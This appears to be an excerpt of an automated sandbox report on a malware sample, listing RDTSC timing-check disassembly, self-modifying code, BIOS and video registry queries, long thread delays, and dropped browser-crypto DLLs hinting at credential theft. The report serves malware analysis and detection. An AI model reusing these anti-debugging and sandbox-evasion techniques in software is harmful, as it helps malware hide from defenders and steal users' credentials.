Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70792 second address: 4A7080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE2E9211D7Ch 0x00000012 jmp 00007FE2E9211D85h 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007FE2E9211D80h 0x0000001e sub si, 77D8h 0x00000023 jmp 00007FE2E9211D7Bh 0x00000028 popfd 0x00000029 popad 0x0000002a push ecx 0x0000002b jmp 00007FE2E9211D7Fh 0x00000030 pop esi 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push edi 0x00000037 pop ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A7080F second address: 4A70814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70814 second address: 4A7081A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A7081A second address: 4A7081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A7081E second address: 4A7086B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FE2E9211D80h 0x00000011 xchg eax, esi 0x00000012 jmp 00007FE2E9211D80h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE2E9211D7Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A7086B second address: 4A70871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70871 second address: 4A708DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FE2E9211D7Eh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 mov eax, 67A9675Dh 0x0000001a pushfd 0x0000001b jmp 00007FE2E9211D7Ah 0x00000020 sub esi, 30CDCBB8h 0x00000026 jmp 00007FE2E9211D7Bh 0x0000002b popfd 0x0000002c popad 0x0000002d sub ebx, ebx 0x0000002f jmp 00007FE2E9211D7Fh 0x00000034 test esi, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov edi, 74EE8656h 0x0000003e mov edi, 08E4B1E2h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A708DB second address: 4A70906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE35B6E793Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70906 second address: 4A7090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A7090C second address: 4A70910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70910 second address: 4A70949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007FE2E9211D89h 0x00000014 mov ecx, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE2E9211D7Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70949 second address: 4A70973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE35B6E78EBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE2E9231EADh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70973 second address: 4A709C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007FE2E9211D83h 0x0000000c or cl, 0000005Eh 0x0000000f jmp 00007FE2E9211D89h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test byte ptr [76FB6968h], 00000002h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FE2E9211D7Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A709C3 second address: 4A70A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FE35B6E7884h 0x0000000f pushad 0x00000010 mov di, si 0x00000013 pushfd 0x00000014 jmp 00007FE2E9231EB8h 0x00000019 and esi, 269365E8h 0x0000001f jmp 00007FE2E9231EABh 0x00000024 popfd 0x00000025 popad 0x00000026 mov edx, dword ptr [ebp+0Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FE2E9231EB5h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70A28 second address: 4A70AD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE2E9211D87h 0x00000009 and cl, FFFFFF8Eh 0x0000000c jmp 00007FE2E9211D89h 0x00000011 popfd 0x00000012 mov esi, 16366197h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FE2E9211D88h 0x00000022 sub si, E838h 0x00000027 jmp 00007FE2E9211D7Bh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FE2E9211D88h 0x00000033 xor ecx, 2CD3E298h 0x00000039 jmp 00007FE2E9211D7Bh 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 pushad 0x00000042 mov esi, ebx 0x00000044 mov edx, 7C854186h 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e movsx ebx, ax 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70AD1 second address: 4A70B2B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FE2E9231EAEh 0x0000000b jmp 00007FE2E9231EB2h 0x00000010 pop eax 0x00000011 popad 0x00000012 push ebx 0x00000013 pushad 0x00000014 movzx esi, bx 0x00000017 mov di, 8C9Ch 0x0000001b popad 0x0000001c mov dword ptr [esp], ebx 0x0000001f jmp 00007FE2E9231EABh 0x00000024 push dword ptr [ebp+14h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FE2E9231EB5h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70B2B second address: 4A70B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE2E9211D7Ch 0x00000013 jmp 00007FE2E9211D85h 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b movzx ecx, di 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70B94 second address: 4A70B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70B98 second address: 4A70B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70B9E second address: 4A70BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70BA4 second address: 4A70BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70BA8 second address: 4A70BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007FE2E9231EB8h 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE2E9231EB7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80C6D second address: 4A80C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80C72 second address: 4A80D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushfd 0x00000006 jmp 00007FE2E9231EB1h 0x0000000b sbb ah, 00000056h 0x0000000e jmp 00007FE2E9231EB1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FE2E9231EACh 0x0000001f add eax, 4AD6E778h 0x00000025 jmp 00007FE2E9231EABh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007FE2E9231EB8h 0x00000031 or si, 81D8h 0x00000036 jmp 00007FE2E9231EABh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007FE2E9231EB9h 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 jmp 00007FE2E9231EACh 0x0000004a jmp 00007FE2E9231EB2h 0x0000004f popad 0x00000050 mov ebp, esp 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FE2E9231EB7h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80ABD second address: 4A80AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE2E9211D80h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80AD6 second address: 4A80AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE2E9231EB5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80AFD second address: 4A80B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 51A72D72h 0x00000008 mov cx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ax, BCEDh 0x00000017 call 00007FE2E9211D7Ah 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF04F6 second address: 4AF0543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 09h 0x00000005 mov di, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov al, CFh 0x0000000f mov bh, E8h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 mov cx, bx 0x00000017 mov bl, 93h 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FE2E9231EB4h 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov dl, cl 0x00000025 mov edx, 3106D42Eh 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FE2E9231EB0h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF035F second address: 4AF037B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF037B second address: 4AF037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF037F second address: 4AF0385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF0385 second address: 4AF03BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov cl, dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE2E9231EB4h 0x00000013 xor cx, 4DF8h 0x00000018 jmp 00007FE2E9231EABh 0x0000001d popfd 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF080B second address: 4AF081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE2E9211D7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316979 second address: 31697F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA048B second address: 4AA048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA048F second address: 4AA0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0495 second address: 4AA054A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE2E9211D7Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE2E9211D82h 0x00000018 xor eax, 48EBE618h 0x0000001e jmp 00007FE2E9211D7Bh 0x00000023 popfd 0x00000024 jmp 00007FE2E9211D88h 0x00000029 popad 0x0000002a call 00007FE2E9211D82h 0x0000002f movzx ecx, dx 0x00000032 pop ebx 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 pushad 0x00000037 mov dx, E24Ah 0x0000003b popad 0x0000003c push FFFFFFFEh 0x0000003e jmp 00007FE2E9211D81h 0x00000043 call 00007FE2E9211D79h 0x00000048 jmp 00007FE2E9211D7Eh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push ecx 0x00000052 pop edi 0x00000053 mov edx, eax 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA054A second address: 4AA05E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 148A8D26h 0x00000008 mov dx, 55B2h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 call 00007FE2E9231EB6h 0x00000019 pop edi 0x0000001a jmp 00007FE2E9231EAEh 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007FE2E9231EABh 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c mov bl, 0Ch 0x0000002e mov bh, ah 0x00000030 popad 0x00000031 pop eax 0x00000032 pushad 0x00000033 jmp 00007FE2E9231EB9h 0x00000038 jmp 00007FE2E9231EB0h 0x0000003d popad 0x0000003e call 00007FE2E9231EA9h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FE2E9231EB7h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA05E9 second address: 4AA0636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE2E9211D81h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007FE2E9211D7Ah 0x0000001b pop esi 0x0000001c jmp 00007FE2E9211D7Bh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0636 second address: 4AA0659 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE2E9231EAFh 0x00000008 pop eax 0x00000009 mov edi, 4AAFDB1Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0659 second address: 4AA065D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA065D second address: 4AA0663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0663 second address: 4AA068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 8Ch 0x00000005 mov edi, 31CFAFE4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007FE2E9211D7Ah 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE2E9211D7Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA068D second address: 4AA069C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA069C second address: 4AA06CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE2E9211D7Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA06CE second address: 4AA06EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ebx, 3A4A8104h 0x0000000f call 00007FE2E9231EADh 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA06EC second address: 4AA0704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA0704 second address: 4AA075C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 28DFh 0x0000000d popad 0x0000000e sub esp, 1Ch 0x00000011 pushad 0x00000012 mov si, 54D7h 0x00000016 mov cl, 67h 0x00000018 popad 0x00000019 push esp 0x0000001a jmp 00007FE2E9231EB4h 0x0000001f mov dword ptr [esp], ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE2E9231EB7h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA075C second address: 4AA07B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE2E9211D85h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e jmp 00007FE2E9211D7Eh 0x00000013 push eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE2E9211D81h 0x0000001b jmp 00007FE2E9211D7Bh 0x00000020 popfd 0x00000021 mov bh, al 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA07B2 second address: 4AA07B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA07B6 second address: 4AA07BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA07BA second address: 4AA07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA07C0 second address: 4AA07C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA07C6 second address: 4AA086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FE2E9231EAEh 0x00000011 push eax 0x00000012 jmp 00007FE2E9231EABh 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FE2E9231EB4h 0x0000001f sub al, FFFFFF88h 0x00000022 jmp 00007FE2E9231EABh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007FE2E9231EB8h 0x0000002e add ecx, 3B296BE8h 0x00000034 jmp 00007FE2E9231EABh 0x00000039 popfd 0x0000003a popad 0x0000003b mov eax, dword ptr [76FBB370h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov eax, edi 0x00000045 jmp 00007FE2E9231EB7h 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA086C second address: 4AA08DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE2E9211D7Fh 0x00000009 or al, FFFFFF8Eh 0x0000000c jmp 00007FE2E9211D89h 0x00000011 popfd 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [ebp-08h], eax 0x0000001a pushad 0x0000001b mov esi, 35EB6A8Fh 0x00000020 call 00007FE2E9211D84h 0x00000025 mov si, 2E11h 0x00000029 pop ecx 0x0000002a popad 0x0000002b xor eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE2E9211D84h 0x00000036 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 15EB6F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 15EAA9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 334605 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 393686 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: AEB6F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: AEAA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 284605 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 2E3686 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04AF079D rdtsc

0_2_04AF079D

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1191	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1654	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 993	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1019	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1007	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 792	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Dropped PE file which has not been started: C:\ProgramData\EBGCFBGCBFHJ\JKJDBA	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_18-100231

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

API coverage: 4.1 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3264	Thread sleep count: 1191 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3264	Thread sleep time: -2383191s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1440	Thread sleep count: 1002 > 30	Jump to behavior
